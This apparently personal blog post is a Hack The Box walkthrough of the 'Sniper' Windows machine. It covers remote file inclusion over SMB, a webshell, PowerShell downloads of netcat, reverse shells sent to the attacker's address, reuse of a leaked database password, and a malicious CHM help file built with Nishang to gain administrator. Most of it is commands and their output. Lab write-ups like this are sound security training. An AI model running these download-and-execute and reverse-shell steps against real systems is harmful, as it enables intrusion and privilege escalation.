htb-sniper-nl

As always 1st a nmap scan

root@kali:~/htb/sniper# nmap -A 10.10.10.151 -oN fullscan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-27 05:00 EST
Nmap scan report for sniper.htb (10.10.10.151)
Host is up (0.091s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m34s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-01-27T18:02:27
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   92.15 ms 10.10.14.1
2   94.52 ms sniper.htb (10.10.10.151)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.82 seconds
root@kali:~/htb/sniper#
I see that only a few ports are open, including SMB and a web server. After some analysis of the SMB server, I find nothing of immediate importance, so I keep browsing the web pages.

At some point in the blog I see one that accepts a parameter, so I start playing with it. Because it can be vulnerable to injection, I start with local and external file injections. After some ups and downs I find that neither local nor external file recording works via HTTP, so I continue to look to see if anything else is possible. With this Burp research I find this link on RFI based on SMB.
GET /blog/?lang=\WINDOWS\system32\drivers\etc\hosts HTTP/1.1 
Host: 10.10.10.151 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: close 
Upgrade-Insecure-Requests: 1

So I reconfigure my SMB server to have a share called "sniper" and see if I can replicate what is in the examples.

see also: https://www.puckiestyle.nl/create-a-public-samba-share/
on kali 1st run : systemctl start smbd


After some trial and error, I see my nickname popping up in the source code, indicating that the RFI over SMB has worked. So now it is time to get this webshell and call it through my SMB Server.

The db.php file contains a username and password, because they can be interesting. I note them for further use and decide it is time to try a decent shell.

powershell Invoke-Webrequest "http://10.10.10.78/nc.exe" -OutFile c:\puckiestyle\nc.exe
So first I use Powershell to transfer netcat. or even simpler with uploading wwwwolfshell

nc.exe 10.10.14.11 9001 -e cmd

Then i call nc.exe , and get a shell on sniper

root@kali:~/htb# rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 49684
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\puckiestyle>whoami
whoami
nt authority\iusr

C:\puckiestyle>
So I got the shell as iUSR There is only one other regular user in the box named Chris. Maybe the database password is the same as the user password, so I want to try using PowerShell to escalate my rights. After some searching on how to use the password with a PowerShell command, I came across a scriptand decided to adjust it to my needs.
root@kalivm:~/Sniper# cat getshell.ps1 
$username = 'SNIPER\Chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword
New-PSSession -Credential $credential | Enter-PSSession

Again, I use PowerShell to transfer the file and then execute it.

powershell Invoke-WebRequest "http://10.10.14.11/getshell.ps1" -OutFile c:\puckiestyle\getshell.ps1
c:\puckiestyle>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\sedje> Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
PS C:\sedje> ./getshell.ps1
./getshell.ps1
[localhost]: PS C:\Users\Chris\Documents> whoami
whoami
sniper\chris
[localhost]: PS C:\Users\Chris\Documents>dir c:\
dir c:\
[localhost]: PS C:\Users\Chris\Documents>
c:\>cmd /c icacls puckiestyle /c /t /grant everyone:F
cmd /c icacls puckiestyle /c /t /grant everyone:F
processed file: puckiestyle
processed file: puckiestyle\getshell.ps1
processed file: puckiestyle\Microsoft
processed file: puckiestyle\nc.exe
processed file: puckiestyle\Microsoft\Windows
processed file: puckiestyle\Microsoft\Windows\PowerShell
processed file: puckiestyle\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Successfully processed 7 files; Failed processing 0 files
c:\puckiestyle>powershell 
powershell 
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\puckiestyle>
[localhost]: PS C:\Users\Chris\Documents> C:\puckiestyle\nc.exe 10.10.14.11 9002 -e powershell
C:\puckiestyle\nc.exe 10.10.14.11 9002 -e powershell
root@kali:/opt/evil-winrm# rlwrap nc -nlvp 9002
listening on [any] 9002 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 49711
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Chris\Documents> type ../Desktop/user.txt
type ../Desktop/user.txt
21f4d0f29fc4dd867500c1ad716cf56e
PS C:\Users\Chris\Documents>

Now I have a fully functional shell

it is also possible with WinRM

first upload and run plink.exe

C:\temp>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.8 
^J.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.8 
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-rsa 2048 85:9c:65:7b:ec:db:65:ee:28:91:c7:2e:2f:e0:22:06
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
^Jlogin as: puck
^Jpuck@10.10.14.8's password: secretpassword
^J
Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jan 27 03:34:27 2020 from 10.10.10.151
Could not chdir to home directory /home/puck: No such file or directory
$

and next

PrivEsc

I found this

PS C:\Users\Chris> dir Downloads
dir Downloads

Directory: C:\Users\Chris\Downloads

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 8:36 AM 10462 instructions.chm
A complete HTML help file,  so this can be interesting. with netcat I transported this file to my windows box, and this was the content

After more enumeration on disk i found

PS C:\DocsC:\Docs> type note.txt
Hi Chris, Your php skillz suck. Contact yamitenshi so that he teaches you how to use it 
and after that fix the website as there are a lot of bugs on it. And I hope that you've
prepared the documentation for our new app. Drop it here when you're done with it.
Regards, Sniper CEO.
So apparently the file instructions.chm is what Chris should prepare for the CEO and then go to this folder.,

I 1st installed htmlexe.exe from https://www.microsoft.com/en-us/download/details.aspx?id=21138

and then used  Nishang : https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1
C:\temp\Powershell -Version 2
PS C:\temp> Import-Module .\Out-CHM.ps1
PS C:\temp> out-chm -Payload "c:\temp\nc 10.10.14.8 5353 -e cmd" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Microsoft HTML Help Compiler 4.74.8702

Compiling c:\temp\doc.chm


Compile time: 0 minutes, 0 seconds
2 Topics
4 Local links
4 Internet links
0 Graphics


Created c:\temp\doc.chm, 13,428 bytes
Compression increased file by 271 bytes.
PS C:\temp> copy .\doc.chm c:\python37\project.chm
root@kali:~/htb/sniper# python3 -m http.server 82
Serving HTTP on 0.0.0.0 port 82 (http://0.0.0.0:82/) ...
10.10.10.151 - - [27/Jan/2020 03:58:26] "GET /project.chm HTTP/1.1" 200 -
PS C:\Docs> Invoke-WebRequest "http://10.10.14.8:82/project.chm" -Outfile c:\Docs\project.chm
Invoke-WebRequest "http://10.10.14.8:82/project.chm" -Outfile c:\Docs\project.chm

From the Sniper host I do an Invoke WebRequest again to download the CHM file to the desired folder while a netcat listener waits for the shell to execute

root@kali:~/Sniper# nc -nlvp 9005
Listening on 0.0.0.0 9005
Connection received on 10.10.10.151 53736   
Microsoft Windows [Version 10.0.17763.678]     
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
sniper\administrator
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
5624caf363e2750e994f6be0b7436c15

Author : Puckiestyle

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *